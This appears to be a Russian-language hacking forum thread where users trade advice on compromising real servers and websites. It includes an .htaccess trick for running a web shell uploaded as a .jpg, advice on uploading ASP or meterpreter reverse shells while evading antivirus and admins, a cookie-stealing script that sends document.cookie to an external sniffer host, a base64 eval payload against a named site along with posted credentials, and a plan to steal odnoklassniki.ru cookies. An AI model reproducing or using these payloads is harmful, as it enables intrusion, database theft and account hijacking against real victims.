sunic то, что сломался дизайн - это еще не признак того, что файл не загрузило. Я бы попробовал залить простую картинку и посмотреть пути к ней, а потом php. Может быть так что в папке куда скрипт сохраняет изображения нет прав на выполнение скриптов тогда поможет загрузка туда же файла .htaccess такого содержания PHP: AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg шелл заливается с расширением jpg
ща напрегу свои екстрасенсорные способности и скажу... yfdthyj порутать сервак сам пониаешь что спрашиваешь? да, там пот кодом который редактируешь есть кнопка save!!!! неужели так сложно разуть глаза и если что-то непонятно то методом тыка попробовать?
посоветуйте куда копать. получил доступ к cmd через microsoft sql. но сервер очень медленный (вывод результата любой команды занимет часы, а если инфы много, то может занять и дни), сервер тормознутый, а бд очень большие. цель пока что - слить бд. что приходит в голову: 1. создать файл, и вставить в него код какого-либо шелла. но как узнать диру, куда заливать, чтобы запустить шелл из веба (пробовал для этого найти ошибки в asp, не получилось). 2. пытаться создать пользователя с админ права, открыть нужный порт и коннектиться к серву удаленно. 3. пытаться залить реверс-шелл (meterpreter) и работать с ним. в каком направлении вы бы посоветовали двигаться? важно, чтобы шанс быть спаленым av или админом был минимальным. инфа о системе - ASP.NET, Microsoft IIS 7.5, Server 2008.
xdzolax ищи админку, заливай asp(лучше на VisualScript написанном) шелл или пробуй через скулю использовать meterpremer, шелл аналогично asp, с путями куда разрешена запись придется экспериментировать(к примеру C:\Windows\Temp) как то так
посоветуйте пожалуйста, ситуация такая, есть проект, в нем найдена уязвимость Remote Code (PHP) Evaluation, предполагаю, что возможно вместо этого кода внести шелл код, форма ввода на странице объясните пожалуйста какой код, как, и куда его можно вставить для внедрения шелла. заранее благодарен!
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене [/QUOTE]<iframe name="ffff" src=http://snifer.ejan.ru/index.php/></iframe> <script> img.src="http://snifer.ejan.ru/img.php?"+document.cookie; </script>
всем привет,у меня вот такой вопрос есть сайт site.ru/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo(); как я понял есть локальный инклуд ,но вот как дальше ./../../ так не пролазиет ,если кодировать в base64 ,то просто вверу сайта выводится ./../../ сколько бы не вводил
Или даже так http://go.jetswap.com/account?mode=data:;base64,PD9waHAgcGhwaW5mbygpPz4= только нужна авторизация на сайте вот логин пароль japan68 261268
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене [/QUOTE]<iframe name="ffff" src=http://snifer.ejan.ru/index.php/></iframe> <script> img.src="http://snifer.ejan.ru/img.php?"+document.cookie; </script>
Подарил людям счастье 58к трафа и тиц 250 PR3, + реверс в добавок, теперь начинается шоу программ "Остаться в живых"
скрипт должен встовляться в тело ломаемой страници, а не там куда ссылается фреем, если можешь вставить фреем в тело страници, значит сможешь вставить и скрипт.
я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер <div id="ok_group_widget"></div> <script> !function (d, id, did, st) { var js = d.createElement("script"); js.src = "http://snifer.ejan.ru/connect.js"; js.onload = js.onreadystatechange = function () { if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") { if (!this.executed) { this.executed = true; setTimeout(function () { OK.CONNECT.insertGroupWidget(id,did,st); }, 0); } }} d.documentElement.appendChild(js); }(document,"ok_group_widget","52864984219766","{width:250,height:335}"); </script>
